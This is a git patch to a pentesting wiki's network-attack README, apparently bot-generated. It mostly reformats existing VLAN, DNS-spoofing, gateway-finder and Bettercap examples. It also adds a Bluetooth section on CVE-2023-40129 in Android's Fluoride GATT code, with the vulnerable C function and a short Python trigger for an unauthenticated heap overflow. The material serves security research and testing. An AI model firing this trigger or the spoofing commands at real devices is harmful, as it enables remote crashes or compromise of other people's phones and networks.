From 3dd22c7e8c1020ebaa0e84f53a93621d14cd3ed1 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Mon, 27 Oct 2025 18:38:23 +0000 Subject: [PATCH] Add content from: Paint it blue: Attacking the bluetooth stack --- .../pentesting-network/README.md | 96 ++++++++++++++++++- 1 file changed, 92 insertions(+), 4 deletions(-) diff --git a/src/generic-methodologies-and-resources/pentesting-network/README.md b/src/generic-methodologies-and-resources/pentesting-network/README.md index cf9367f951f..a128c17e554 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/README.md +++ b/src/generic-methodologies-and-resources/pentesting-network/README.md @@ -333,7 +333,10 @@ By analyzing the STP frames, **we learn about the existence of VLAN 30 and VLAN Once you known VLAN IDs and IPs values, you can **configure a virtual interface to attack a specific VLAN**.\ If DHCP is not available, then use _ifconfig_ to set a static IP address. -``` +
+VLAN interface configuration (example) + +```bash root@kali:~# modprobe 8021q root@kali:~# vconfig add eth1 250 Added VLAN with VID == 250 to IF -:eth1:- @@ -352,6 +355,9 @@ eth1.250 Link encap:Ethernet HWaddr 00:0e:c6:f0:29:65 root@kali:~# arp-scan -I eth1.250 10.121.5.0/24 ``` +
+ + ```bash # Another configuration example modprobe 8021q @@ -691,15 +697,22 @@ set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on **Configure own DNS with dnsmasq** ```bash -apt-get install dnsmasqecho "addn-hosts=dnsmasq.hosts" > dnsmasq.conf #Create dnsmasq.confecho "127.0.0.1 domain.example.com" > dnsmasq.hosts #Domains in dnsmasq.hosts will be the domains resolved by the Dsudo dnsmasq -C dnsmasq.conf --no-daemon +apt-get install dnsmasq +echo "addn-hosts=dnsmasq.hosts" > dnsmasq.conf +echo "127.0.0.1 domain.example.com" > dnsmasq.hosts +sudo dnsmasq -C dnsmasq.conf --no-daemon dig @localhost domain.example.com # Test the configured DNS ``` + ### Local Gateways Multiple routes to systems and networks often exist. Upon building a list of MAC addresses within the local network, use _gateway-finder.py_ to identify hosts that support IPv4 forwarding. -``` +
+gateway-finder usage example + +```bash root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git root@kali:~# cd gateway-finder/ root@kali:~# arp-scan -l | tee hosts.txt @@ -717,6 +730,9 @@ gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder [+] We can reach TCP port 80 on 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100] ``` +
+ + ### [Spoofing LLMNR, NBT-NS, and mDNS](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) For local host resolution when DNS lookups are unsuccessful, Microsoft systems rely on **Link-Local Multicast Name Resolution (LLMNR)** and the **NetBIOS Name Service (NBT-NS)**. Similarly, **Apple Bonjour** and **Linux zero-configuration** implementations utilize **Multicast DNS (mDNS)** for discovering systems within a network. Due to the unauthenticated nature of these protocols and their operation over UDP, broadcasting messages, they can be exploited by attackers aiming to redirect users to malicious services. @@ -796,7 +812,7 @@ Note that in order to perform this attack the victim has to try to access initia More info [here](https://www.bettercap.org/legacy/#hsts-bypass), [here](https://www.slideshare.net/Fatuo__/offensive-exploiting-dns-servers-changes-blackhat-asia-2014) and [here](https://security.stackexchange.com/questions/91092/how-does-bypassing-hsts-with-sslstrip-work-exactly). -**sslStrip or sslStrip+ doesn;t work anymore. This is because there are HSTS rules presaved in the browsers, so even if it's the first time that a user access an "important" domain he will access it via HTTPS. Also, notice that the presaved rules and other generated rules can use the flag** [**`includeSubdomains`**](https://hstspreload.appspot.com) **so the** _**wwww.facebook.com**_ **example from before won't work anymore as** _**facebook.com**_ **uses HSTS with `includeSubdomains`.** +**sslStrip or sslStrip+ doesn't work anymore. This is because there are HSTS rules presaved in the browsers, so even if it's the first time that a user access an "important" domain he will access it via HTTPS. Also, notice that the presaved rules and other generated rules can use the flag** [**`includeSubdomains`**](https://hstspreload.appspot.com) **so the** _**wwww.facebook.com**_ **example from before won't work anymore as** _**facebook.com**_ **uses HSTS with `includeSubdomains`.** TODO: easy-creds, evilgrade, metasploit, factory @@ -840,6 +856,9 @@ Other things to test is to try to sign the certificate with a valid certificate ## Bettercap +
+Common Bettercap commands + ```bash # Events events.stream off #Stop showing events @@ -866,6 +885,9 @@ set wifi.ap.encryption false #If true, WPA2 wifi.recon on; wifi.ap ``` +
+ + ### Active Discovery Notes Take into account that when a UDP packet is sent to a device that do not have the requested port an ICMP (Port Unreachable) is sent. @@ -897,6 +919,70 @@ Bettercap broadcast SSDP packets searching for all kind of services (UDP Port 19 Bettercap broadcast WSD packets searching for services (UDP Port 3702). +## Bluetooth (L2CAP/ATT/GATT) Attacks + +- Android Fluoride exposes services over L2CAP PSMs (e.g., SDP 0x0001, RFCOMM 0x0003, BNEP 0x000F, AVCTP 0x0017/0x001B, AVDTP 0x0019, ATT/GATT 0x001F). Services register via: + +```c +uint16_t L2CA_Register2(uint16_t psm, const tL2CAP_APPL_INFO& p_cb_info, + bool enable_snoop, tL2CAP_ERTM_INFO* p_ertm_info, + uint16_t my_mtu, uint16_t required_remote_mtu, + uint16_t sec_level); +``` + +- BlueBlue framework enables Scapy-based L2CAP/ATT crafting (built on BlueBorne l2cap_infra). Example: + +```python +acl = ACLConnection(src_bdaddr, dst_bdaddr, auth_mode='justworks') +gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=672) +gatt.send_frag(p8(GATT_READ)+p16(1234)) +print(gatt.recv()) +``` + +- CVE-2023-40129 (Fluoride GATT): integer underflow in Read Multiple Variable response builder can cause ~64KB heap overflow when MTU truncates a variable-length element but the +2 length field is not accounted for. + +
+Root cause (GATT Read Multiple Variable) + +```c +static void build_read_multi_rsp(tGATT_SR_CMD* p_cmd, uint16_t mtu) { + uint16_t ii, total_len, len; uint8_t* p; bool is_overflow=false; + len = sizeof(BT_HDR) + L2CAP_MIN_OFFSET + mtu; + BT_HDR* p_buf = (BT_HDR*)osi_calloc(len); p_buf->offset=L2CAP_MIN_OFFSET; + p = (uint8_t*)(p_buf + 1) + p_buf->offset; *p++ = GATT_RSP_READ_MULTI_VAR; + p_buf->len=1; + for (ii=0; iimulti_req.num_handles; ii++) { + tGATTS_RSP* p_rsp = ...; // dequeued + if (p_rsp) { + total_len = (p_buf->len + p_rsp->attr_value.len); + if (p_cmd->multi_req.variable_len) total_len += 2; + if (total_len > mtu) { + len = p_rsp->attr_value.len - (total_len - mtu); // BUG: ignores +2 + is_overflow = true; + } else { len = p_rsp->attr_value.len; } + if (p_cmd->multi_req.variable_len) { UINT16_TO_STREAM(p, len); p_buf->len += 2; } + memcpy(p, p_rsp->attr_value.value, len); // heap overflow + if (!is_overflow) p += len; p_buf->len += len; if (is_overflow) break; + } + } +} +``` + +- On variable-length entries, the overflow path subtracts only (total_len - mtu), ignoring the +2 length field, so len underflows (e.g., 0xFFFE) and memcpy writes ~64KB past the end of the buffer. +
+ +- Minimal unauthenticated trigger (small MTU forces underflow on the 4th attribute): + +```python +# GATT_REQ_READ_MULTI_VAR (0x20), MTU=55 +acl = ACLConnection(interface, bdaddr) +gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=55) +pkt = b'\x20' # opcode +pkt += p16(9); pkt += p16(9); pkt += p16(9); pkt += p16(9) +gatt.send(pkt) +# On 4th insert: p_buf->len=55 (1 + 3*(16+2)), total_len=73 -> len=16-(73-55)=-2 -> ~64KB overwrite +``` + ### Telecom / Mobile-Core (GTP) Exploitation @@ -910,6 +996,8 @@ telecom-network-exploitation.md - **Network Security Assessment: Know Your Network (3rd edition)** - **Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things. By Fotios Chantzis, Ioannis Stais, Paulino Calderon, Evangelos Deirmentzoglou, Beau Wood** - [https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) +- [Paint it blue: Attacking the bluetooth stack (Synacktiv)](https://www.synacktiv.com/en/publications/paint-it-blue-attacking-the-bluetooth-stack) +- [BlueBorne L2CAP testing infra (l2cap_infra)](https://github.com/ArmisSecurity/blueborne/tree/master/l2cap_infra)